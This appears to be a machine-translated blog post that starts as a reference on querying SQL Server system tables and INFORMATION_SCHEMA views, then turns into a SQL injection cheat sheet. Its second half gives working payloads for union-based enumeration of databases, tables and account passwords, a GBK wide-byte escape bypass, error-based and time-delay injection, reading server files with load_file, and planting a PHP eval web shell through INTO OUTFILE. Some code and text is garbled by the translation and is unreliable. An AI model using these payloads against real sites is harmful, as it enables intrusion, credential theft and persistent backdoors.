Querying system tables and system views under Master for database information and simple penetration testing

in the SQL can be queried by the master system table (SYS) under the ) and System view (Information_schema ) To obtain information about the database. the structure of SQL2000 and SQL2005 is slightly different.

system table Structure Reference system table detailed description.

System Information Structure Map reference: http://dev.mysql.com/doc/refman/5.1/zh/information-schema.html

1 , the To do the following:

system table Directory: Most are prefixed with Dbo.sys.

System View Catalog: There are 20 common views, prefixed with INFORMATION_SCHEMA.

In 2000 we can use these two methods of query to get the same effect.

For example: query all databases:

Select name from Master. sysdatabases

Select Catalog_name from INFORMATION_SCHEMA. Schemata

The same effect.

Querying all databases created by the user

SELECT * FROM Master. sysdatabases D where Sid not in (select Sid from Master: syslogins where name= ' sa ')

Or

Select dbid, name as Db_name from master. sysdatabases where Sid <> 0x01

Or

Select name from Master. sysdatabases ORDER BY name ASC

Get all user tables in the current database:

Select Name from sysobjects where xtype= ' u ' and status>=0

SELECT table_name from INFORMATION_SCHEMA. TABLES WHERE table_type = ' BASE TABLE '

Get all fields of a table

Select name from syscolumns where id=object_id (' Table name ')

SELECT column_name from INFORMATION_SCHEMA. COLUMNS WHERE table_name = ' table name '

View views, stored procedures, functions related to a table

Select a.* from sysobjects A, syscomments b where a.id = b.ID and b.text like '% table name% '

View all stored procedures in the current database

Select name as stored procedure name from sysobjects where xtype= ' P '

Querying the fields and data types of a table

Select Name,xtye from syscolumns where id=object_id (' Table name ')

SELECT Column_name,data_type from INFORMATION_SCHEMA. COLUMNS WHERE table_name = ' table name '

2 , 2005 To do the following:

System tables Directory: System tables in 2000, which are placed in the System view directory in 05.

System View Catalog: The system tables and views are stored, and many new system tables, such as XML support, are added. prefixed with Sys.

In 2005, the system tables still belong to the master database. However, the view is assigned to each database. So:

Select name from Master. sysdatabases

Select Catalog_name from INFORMATION_SCHEMA. Schemata

The two types of queries above will have different results.

The first query can still return all the database lists.

The second query only returns information for the currently connected database.

In addition to other database-specific operations, The same.

due to the different structure, in order to ensure uniformity, we are best to use system tables when working with the entire server. In the case of a specific database operation, you can use either a system table or an information structure diagram.

The following is a simple penetration test

MAGIC_QUOTES_GPC = on addslashes () filter, on ' \ Null escaped that is preceded by a backslash

Ps:intval () used to filter numeric types

register_globals = Off Close registered global variables

display_errors = Off Turn off error hints

GBK wide byte breakout MAGIC_QUOTES_GPC = on Limit with% f5 ' instead of ' that ' become 鮘 ' rather than \ '

Practice Discovery

Suppose ID is a numeric type, if the SQL The statement is id= ' $id ' even with single quotes, that commits? Id=1 and 1=1 and Id=1 and 1=2. The results are all id=1. take the arguments that precede the spaces.

at this point you can use the id=1 ' and 1=1# and Id=1 ' and 1=2# to judge and construct SQL statement.

View PHP code sometimes does not replace some words such as < , the return page will not be able to view the code.

Replace (Load_file (HEX), Char, char (32))

Union Select 1,replace (Load_file (HEX), Char, char (32)), 3

char (max) Presentation <

char (+) represents Space

Illegal mix of collations (latin1_swedish_ci,implicit) and (utf8_general_ci,implicit) for operation ' UNION '

Indicates inconsistent encoding before and after

Unhex (Hex ( parametric))

Union Select 1,unhex (Hex (Load_file (hex))), 3

@ @hostname DATA server name

@ @version_compile_os Judging System Types

@ @basedir Database installation directory

@ @datadir Database Storage Directory

@ @plugin_dir plug-in directory path

@ @group_concat_max_len group_concat () Maximum length

User () Current User

database () Current Database

version () MySQL version

concat ( field 1,0x7c, field 2,0x7c, field N) Connect multiple parameters

group_concat ( field) List all Rows

Load_file ( Physical Address of the system file) Read File

Write Webshell <?php @eval_r ($_post[' C '); > ps:windows address with/ or \ \ , alone \ not.

and 1=2 Union select 1,0x3c3f70687020406576616c28245f504f53545b2763275d293b3f3e,3,.. N into outfile ' file Physical Address '

Select User,password,update_priv,file_priv from Mysql.user mysql.user Global permissions for users

SELECT * from Mysql.db mysql.db operating permissions for a user database

and (SELECT COUNT (*) from table segment) >0

and (select count ( field) from table segment) >0

and (select Length ( field) from the table segment limit n,1) >5

and (select ASCII (Mid ( field, n,1)) from table segment limit n,1) >96

and substring (@ @version, 1, 1) =5

ORDER BY N

and 1=2 Union Select 1,2,3,4,5,6,7,8,9,n#

and 1=2 Union select 1,2,table_schema,4,5,6,7,8,9,n from INFORMATION_SCHEMA. COLUMNS GROUP BY Table_schema limit n,1 query the nth database name

and 1=2 Union select 1,2,table_name,4,5,6,7,8,9,n from INFORMATION_SCHEMA. COLUMNS where table_schema=16 database name limit n,1 look up a table segment name

and 1=2 Union select 1,2,column_name,4,5,6,7,8,9,n from INFORMATION_SCHEMA. COLUMNS where table_schema=16 binary database name and table_name=16 tab segment name limit n,1 Check field name

and 1=2 Union Select, fields, 4,5, field, 7,8,9,n from The database name. table segment name limit n,1 Check your account password

Offset injection

ORDER BY ten The field being queried has ten a

and 1=2 Union select *,1,2,3,4,5,6,7 from admin Table Section Admin there are 3 a field

and 1=2 Union select 1,2,3,4,5,6,7,8,9,id from admin Table Section Admin Field ID exists

and 1=2 Union select *,1,2,3,4 from (admin as a inner join admin as B on a.id=b.id) in 5-10 Location Display Data

and 1=2 Union select *,1 from ((admin as a inner join admin as B in a.id=b.id) INNER join admin as C on a.id=c.id) displaying Data in 2-10 locations

MySQL Error Echo Set Formula method injection

+and+1=2+union+select+1+from+ (Select+count (*), concat (Floor (rand (0)), ( injected burst data statement)) a+from+ Information_schema.tables+group+by+a) b#

+or+1= (select+1+from+ (Select+count (*), concat (rand (0), ( injection Burst data statement)) A+from+information_ Schema.tables+group+by+a) b) #

Injection BURST Data statement

Select+concat (0x3a,database (), 0x3a,user (), 0x3a,version (), 0x3a,@ @datadir)

Select+table_name+from+information_schema.tables+where+table_schema=database () +limit+0,1

Delay injection

Select Benchmark (5000000, MD5 (' Test ')) from user where id=1 and 1=1

SELECT * from user where id=1 or 1= (select Benchmark (5000000, MD5 (' Test ')))

Select if (ASCII (substring (version ()), <54,benchmark) (5000000, MD5 (' Test ')), 0) from user where id=1 and 1=1

SELECT * from user where id=1 or if (ASCII (substring (version ()), 0)) <54,benchmark (5000000, MD5 (' Test '))

Querying system tables and system views under Master for database information and simple penetration testing